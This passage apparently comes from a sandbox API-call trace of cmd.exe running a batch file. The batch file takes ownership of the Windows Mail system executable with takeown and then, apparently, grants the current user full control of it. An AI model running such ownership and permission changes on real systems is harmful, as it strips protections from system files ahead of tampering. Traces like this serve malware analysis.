(hFile=0x74) returned 0x1 [0238.935] _get_osfhandle (_FileHandle=3) returned 0x74 [0238.935] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0238.935] GetProcessHeap () returned 0x530000 [0238.935] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x400a) returned 0x554af8 [0238.935] GetProcessHeap () returned 0x530000 [0238.935] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x554af8 | out: hHeap=0x530000) returned 1 [0238.937] GetProcessHeap () returned 0x530000 [0238.937] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x68) returned 0x531240 [0238.939] _tell (_FileHandle=3) returned 47 [0238.939] _close (_FileHandle=3) returned 0 [0238.939] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf054 | out: _Buffer="\r\n") returned 2 [0238.939] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.939] GetFileType (hFile=0x7) returned 0x2 [0238.940] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0238.940] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf014 | out: lpMode=0x2cf014) returned 1 [0238.941] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.941] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf040, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf040*=0x2) returned 1 [0238.943] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0238.944] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0238.944] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cf050 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0238.944] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cf050 | out: _Buffer=">") returned 1 [0238.944] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.944] GetFileType (hFile=0x7) returned 0x2 [0238.945] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0238.945] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf018 | out: lpMode=0x2cf018) returned 1 [0238.945] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.945] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2cf044, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2cf044*=0x26) returned 1 [0238.946] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.946] GetFileType (hFile=0x7) returned 0x2 [0238.946] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0238.946] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf29c | out: lpMode=0x2cf29c) returned 1 [0238.947] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.947] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x543668*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x2cf2c8, lpReserved=0x0 | out: lpBuffer=0x543668*, lpNumberOfCharsWritten=0x2cf2c8*=0x7) returned 1 [0238.947] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2cf2d4 | out: _Buffer=" /F \"C:\\Program Files\\Windows Mail\\WinMail.exe\" ") returned 48 [0238.947] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.947] GetFileType (hFile=0x7) returned 0x2 [0238.948] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0238.948] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf294 | out: lpMode=0x2cf294) returned 1 [0238.948] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.948] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x30, lpNumberOfCharsWritten=0x2cf2c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2c0*=0x30) returned 1 [0238.950] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf2f4 | out: _Buffer="\r\n") returned 2 [0238.950] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.950] GetFileType (hFile=0x7) returned 0x2 [0238.951] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0238.951] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf2b4 | out: lpMode=0x2cf2b4) returned 1 [0238.951] _get_osfhandle (_FileHandle=1) returned 0x7 [0238.951] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf2e0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2e0*=0x2) returned 1 [0238.953] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0238.953] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0238.953] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0238.953] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0238.953] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0238.953] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0238.953] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0238.953] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0238.953] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0238.953] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0238.953] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0238.953] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0238.953] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0238.953] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0238.953] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0238.953] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0238.953] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0238.954] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0238.954] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0238.954] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0238.954] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0238.954] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0238.954] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0238.954] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0238.954] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0238.954] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0238.954] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0238.954] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0238.954] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0238.954] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0238.954] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0238.954] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0238.954] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0238.954] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0238.954] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0238.954] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0238.954] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0238.954] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0238.954] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0238.954] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0238.954] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0238.954] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0238.956] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x544168, lpFilePart=0x2cf098 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf098*="Desktop") returned 0x25 [0238.956] SetErrorMode (uMode=0x0) returned 0x1 [0238.956] GetProcessHeap () returned 0x530000 [0238.956] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x544160, Size=0x64) returned 0x544160 [0238.956] GetProcessHeap () returned 0x530000 [0238.956] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x544160) returned 0x64 [0238.956] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0238.956] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0238.956] GetProcessHeap () returned 0x530000 [0238.956] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x120) returned 0x5441d0 [0238.956] GetProcessHeap () returned 0x530000 [0238.956] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x238) returned 0x5442f8 [0238.956] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0238.957] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x2cee14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee14) returned 0xffffffff [0238.957] GetLastError () returned 0x2 [0238.957] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x2cee14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee14) returned 0xffffffff [0238.957] GetLastError () returned 0x2 [0238.958] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0238.958] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x2cee14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee14) returned 0x5444a8 [0238.958] FindClose (in: hFindFile=0x5444a8 | out: hFindFile=0x5444a8) returned 1 [0238.958] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x2cee14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee14) returned 0xffffffff [0238.959] GetLastError () returned 0x2 [0238.959] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x2cee14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cee14) returned 0x5444a8 [0238.959] FindClose (in: hFindFile=0x5444a8 | out: hFindFile=0x5444a8) returned 1 [0238.959] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0238.959] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0238.960] GetConsoleTitleW (in: lpConsoleTitle=0x2cee64, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0238.960] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5446c8, lpFilePart=0x2ce984 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ce984*="Desktop") returned 0x25 [0238.960] SetErrorMode (uMode=0x0) returned 0x1 [0238.960] GetProcessHeap () returned 0x530000 [0238.961] RtlReAllocateHeap (Heap=0x530000, Flags=0x0, Ptr=0x5446c0, Size=0x64) returned 0x5446c0 [0238.961] GetProcessHeap () returned 0x530000 [0238.961] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x5446c0) returned 0x64 [0238.961] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0238.961] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0238.961] GetProcessHeap () returned 0x530000 [0238.961] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x120) returned 0x544730 [0238.961] GetProcessHeap () returned 0x530000 [0238.961] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x238) returned 0x544858 [0238.961] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0238.962] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x2ce700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce700) returned 0xffffffff [0238.962] GetLastError () returned 0x2 [0238.962] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x2ce700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce700) returned 0xffffffff [0238.962] GetLastError () returned 0x2 [0238.963] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0238.963] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x2ce700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce700) returned 0x544a08 [0238.963] FindClose (in: hFindFile=0x544a08 | out: hFindFile=0x544a08) returned 1 [0238.964] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x2ce700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce700) returned 0xffffffff [0238.964] GetLastError () returned 0x2 [0238.964] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ce700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce700) returned 0x544a08 [0238.964] FindClose (in: hFindFile=0x544a08 | out: hFindFile=0x544a08) returned 1 [0238.964] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0238.964] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0238.964] GetConsoleTitleW (in: lpConsoleTitle=0x2cebf8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0238.965] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cea80, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ceb48 | out: lpAttributeList=0x2cea80, lpSize=0x2ceb48) returned 1 [0238.965] UpdateProcThreadAttribute (in: lpAttributeList=0x2cea80, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ceb40, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cea80, lpPreviousValue=0x0) returned 1 [0238.965] GetStartupInfoW (in: lpStartupInfo=0x2cea3c | out: lpStartupInfo=0x2cea3c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0238.965] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0238.965] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Mail\\WinMail.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2ceadc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Mail\\WinMail.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ceb28 | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Mail\\WinMail.exe\"", lpProcessInformation=0x2ceb28*(hProcess=0x78, hThread=0x74, dwProcessId=0xacc, dwThreadId=0x3c4)) returned 1 [0239.035] CloseHandle (hObject=0x74) returned 1 [0239.035] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0239.035] GetProcessHeap () returned 0x530000 [0239.035] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x548168 | out: hHeap=0x530000) returned 1 [0239.035] GetEnvironmentStringsW () returned 0x545f80* [0239.035] GetProcessHeap () returned 0x530000 [0239.035] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb5c) returned 0x548168 [0239.035] FreeEnvironmentStringsW (penv=0x545f80) returned 1 [0239.035] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0241.066] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x2cea1c | out: lpExitCode=0x2cea1c*=0x0) returned 1 [0241.066] CloseHandle (hObject=0x78) returned 1 [0241.066] _vsnwprintf (in: _Buffer=0x2ceb64, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cea28 | out: _Buffer="00000000") returned 8 [0241.066] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0241.066] GetProcessHeap () returned 0x530000 [0241.066] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x548168 | out: hHeap=0x530000) returned 1 [0241.066] GetEnvironmentStringsW () returned 0x545f80* [0241.067] GetProcessHeap () returned 0x530000 [0241.067] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb5c) returned 0x548168 [0241.067] FreeEnvironmentStringsW (penv=0x545f80) returned 1 [0241.067] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0241.067] GetProcessHeap () returned 0x530000 [0241.067] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x548168 | out: hHeap=0x530000) returned 1 [0241.067] GetEnvironmentStringsW () returned 0x545f80* [0241.067] GetProcessHeap () returned 0x530000 [0241.067] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb5c) returned 0x548168 [0241.067] FreeEnvironmentStringsW (penv=0x545f80) returned 1 [0241.067] GetProcessHeap () returned 0x530000 [0241.067] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x530ce8 | out: hHeap=0x530000) returned 1 [0241.067] DeleteProcThreadAttributeList (in: lpAttributeList=0x2cea80 | out: lpAttributeList=0x2cea80) [0241.067] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.067] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0241.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.068] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0241.068] _get_osfhandle (_FileHandle=0) returned 0x3 [0241.068] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0241.069] SetConsoleInputExeNameW () returned 0x1 [0241.069] GetConsoleOutputCP () returned 0x1b5 [0241.069] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0241.069] SetThreadUILanguage (LangId=0x0) returned 0x409 [0241.069] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2cf29c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0241.070] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0241.070] _get_osfhandle (_FileHandle=3) returned 0x78 [0241.070] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0241.070] GetProcessHeap () returned 0x530000 [0241.070] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544988 | out: hHeap=0x530000) returned 1 [0241.070] GetProcessHeap () returned 0x530000 [0241.070] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544858 | out: hHeap=0x530000) returned 1 [0241.070] GetProcessHeap () returned 0x530000 [0241.070] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544730 | out: hHeap=0x530000) returned 1 [0241.070] GetProcessHeap () returned 0x530000 [0241.070] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5446c0 | out: hHeap=0x530000) returned 1 [0241.070] GetProcessHeap () returned 0x530000 [0241.070] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x552c10 | out: hHeap=0x530000) returned 1 [0241.070] GetProcessHeap () returned 0x530000 [0241.070] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5444a8 | out: hHeap=0x530000) returned 1 [0241.070] GetProcessHeap () returned 0x530000 [0241.070] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544428 | out: hHeap=0x530000) returned 1 [0241.070] GetProcessHeap () returned 0x530000 [0241.070] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5442f8 | out: hHeap=0x530000) returned 1 [0241.070] GetProcessHeap () returned 0x530000 [0241.070] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5441d0 | out: hHeap=0x530000) returned 1 [0241.070] GetProcessHeap () returned 0x530000 [0241.070] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544160 | out: hHeap=0x530000) returned 1 [0241.070] GetProcessHeap () returned 0x530000 [0241.070] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x531240 | out: hHeap=0x530000) returned 1 [0241.070] GetProcessHeap () returned 0x530000 [0241.071] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x543660 | out: hHeap=0x530000) returned 1 [0241.071] GetProcessHeap () returned 0x530000 [0241.071] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5311c0 | out: hHeap=0x530000) returned 1 [0241.071] _get_osfhandle (_FileHandle=3) returned 0x78 [0241.071] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0241.071] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2cf280, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2cf280*=0xb3, lpOverlapped=0x0) returned 1 [0241.072] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0241.072] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0241.073] _get_osfhandle (_FileHandle=3) returned 0x78 [0241.073] GetFileType (hFile=0x78) returned 0x1 [0241.073] _get_osfhandle (_FileHandle=3) returned 0x78 [0241.073] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0241.073] GetProcessHeap () returned 0x530000 [0241.073] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x400a) returned 0x554af8 [0241.074] GetProcessHeap () returned 0x530000 [0241.074] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5e) returned 0x531240 [0241.074] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Mail\\WinMail.exe", nBufferLength=0x208, lpBuffer=0x2cea10, lpFilePart=0x2cea08 | out: lpBuffer="C:\\Program Files\\Windows Mail\\WinMail.exe", lpFilePart=0x2cea08*="WinMail.exe") returned 0x29 [0241.074] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x2ce724 | out: lpFindFileData=0x2ce724*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x5311c0 [0241.074] FindClose (in: hFindFile=0x5311c0 | out: hFindFile=0x5311c0) returned 1 [0241.074] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0241.074] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail", lpFindFileData=0x2ce724 | out: lpFindFileData=0x2ce724*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xddb7c380, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xddb7c380, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 0x5311c0 [0241.074] FindClose (in: hFindFile=0x5311c0 | out: hFindFile=0x5311c0) returned 1 [0241.074] _wcsnicmp (_String1="WINDOW~1", _String2="Windows Mail", _MaxCount=0xc) returned 11 [0241.074] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail\\WinMail.exe", lpFindFileData=0x2ce724 | out: lpFindFileData=0x2ce724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2062a1d, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xc2062a1d, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xfbe97cf0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x61600, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMail.exe", cAlternateFileName="")) returned 0x5311c0 [0241.074] FindClose (in: hFindFile=0x5311c0 | out: hFindFile=0x5311c0) returned 1 [0241.075] GetProcessHeap () returned 0x530000 [0241.075] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x545838 [0241.075] GetProcessHeap () returned 0x530000 [0241.075] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x554af8 | out: hHeap=0x530000) returned 1 [0241.077] _tell (_FileHandle=3) returned 63 [0241.077] _close (_FileHandle=3) returned 0 [0241.077] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf054 | out: _Buffer="\r\n") returned 2 [0241.077] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.078] GetFileType (hFile=0x7) returned 0x2 [0241.078] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.078] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf014 | out: lpMode=0x2cf014) returned 1 [0241.078] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.078] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf040, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf040*=0x2) returned 1 [0241.417] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0241.417] GetCurrentDirectoryW (in: 